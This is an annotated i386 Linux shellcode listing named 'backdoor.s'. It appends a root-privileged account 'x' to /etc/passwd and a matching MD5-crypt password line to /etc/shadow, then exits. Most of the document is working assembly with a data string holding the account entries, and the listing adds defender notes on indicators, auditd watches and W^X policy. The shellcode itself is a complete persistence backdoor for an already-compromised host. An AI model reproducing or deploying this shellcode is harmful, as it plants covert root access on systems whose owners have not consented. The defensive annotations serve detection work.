[SC] backdoor.s : 2006-11-30
# -----------------------------------------------------------------------
# Target: Linux i386, system calls via int $0x80; GAS AT&T syntax.
#
# What the listing does, in order:
#   1. open("/etc/passwd", O_WRONLY), lseek to end, write 22 bytes, close
#   2. open("/etc/shadow", O_WRONLY), lseek to end, write 45 bytes, close
#   3. exit(0)
# The 22 bytes are "x:x:0:0::/etc:/bin/sh\n": an account named "x" with
# UID 0 and GID 0, home /etc, shell /bin/sh.
# The 45 bytes are the matching shadow line, carrying a "$1$" (MD5-crypt)
# password hash with the salt visible in the .string below.
#
# Notes for defenders:
#   - Both files are opened write-only without O_CREAT; on a typical
#     system that needs root, so this is persistence after a compromise,
#     not a privilege escalation by itself.
#   - Indicators on disk: a UID-0 passwd entry other than root (here the
#     name "x" with home /etc) and a shadow entry holding the hash from
#     the .string below.
#   - Detection: file-integrity monitoring or audit watches on both
#     files (e.g. auditd "-w /etc/passwd -p wa", same for /etc/shadow),
#     plus a periodic check for more than one account with UID 0.
#   - The code overwrites bytes of the string stored right after it, so
#     the page holding it must be both writable and executable; a W^X /
#     NX policy blocks that.
#   - No system-call return value is checked anywhere; a failed open is
#     passed on as the file descriptor of the following calls.
# -----------------------------------------------------------------------
.globl main
main:
# Jump forward to the call at ONE; the call pushes the address of the
# .string that follows it, which TWO pops as its data pointer.
jmp ONE
TWO:
# ---- /etc/passwd ----
# ebx = address of the .string (return address pushed by "call TWO").
popl %ebx
xorl %eax, %eax
# Patch the '_' placeholders in the string at run time:
#   offset 11 -> NUL      terminates "/etc/passwd"
#   offset 33 -> newline  ends the passwd entry
#   offset 34 -> NUL
#   offset 46 -> NUL      terminates "/etc/shadow"
#   offset 91 -> newline  ends the shadow entry (replaces the string's own NUL)
#   offset 92 -> NUL      one byte past what .string assembles
# Presumably the placeholders keep NUL and newline bytes out of the
# assembled payload -- inferred, not stated on the page.
movb %al, 11(%ebx)
movb $0x0a, 33(%ebx)
movb %al, 34(%ebx)
movb %al, 46(%ebx)
movb $0x0a, 91(%ebx)
movb %al, 92(%ebx)
# open(ebx = "/etc/passwd", ecx = 1 = O_WRONLY); eax = 5 is open on i386.
# edx (mode) is not set; it is unused because O_CREAT is not passed.
movb $0x5, %al
xorl %ecx, %ecx
inc %ecx
int $0x80
# esi = string + 12 = start of the passwd entry; ebx = fd returned by open.
add $12, %ebx
movl %ebx, %esi
movl %eax, %ebx
# lseek(fd, 0, 2 = SEEK_END); eax = 19 is lseek on i386. Appends without O_APPEND.
xorl %ecx, %ecx
xorl %edx, %edx
inc %edx
inc %edx
xorl %eax, %eax
movb $19, %al
int $0x80
# write(fd, esi, 22): 21 characters of the entry plus the patched newline.
xorl %eax, %eax
movb $0x4, %al
movl %esi, %ecx
movb $22, %dl
int $0x80
# close(fd). Only al is loaded: eax still holds write's return value, so
# the call number is 6 only if the upper 24 bits are zero (write succeeded).
movb $0x6, %al
int $0x80
# ecx still points at the passwd entry (string + 12); +23 gives
# string + 35, the start of "/etc/shadow".
movl %ecx, %ebx
add $23, %ebx
# ---- /etc/shadow ----
# open(ebx = "/etc/shadow", O_WRONLY). Again only al is loaded; relies on
# close having returned 0 in eax.
movb $0x5, %al
xorl %ecx, %ecx
inc %ecx
int $0x80
# esi = string + 47 = start of the shadow entry; ebx = fd returned by open.
add $12, %ebx
movl %ebx, %esi
movl %eax, %ebx
# lseek(fd, 0, SEEK_END)
xorl %ecx, %ecx
xorl %edx, %edx
inc %edx
inc %edx
xorl %eax, %eax
movb $19, %al
int $0x80
# write(fd, esi, 45): 44 characters of the entry plus the patched newline.
xorl %eax, %eax
movb $0x4, %al
movl %esi, %ecx
movb $45, %dl
int $0x80
# close(fd); same al-only load as the first close.
movb $0x6, %al
int $0x80
# exit(0): eax = 1, ebx = 0.
xorl %eax, %eax
movb $0x1, %al
xorl %ebx, %ebx
int $0x80
ONE:
# The return address pushed by this call is the address of the string below.
call TWO
# Data layout (offsets from the start of the string, '_' = patched at run time):
#    0..10  "/etc/passwd"            11     '_'
#   12..32  passwd entry             33,34  "__"
#   35..45  "/etc/shadow"            46     '_'
#   47..90  shadow entry             91     NUL emitted by .string
# No section directive precedes it, so it is assembled into the same
# section as the code above.
.string "/etc/passwd_x:x:0:0::/etc:/bin/sh__/etc/shadow_x:$1$N9rTnvmD$Z.e92/gt.SqCmUyyxHI6A0:1::::::"
Copyleft (C) 2007 Len. All Rights Not Reserved.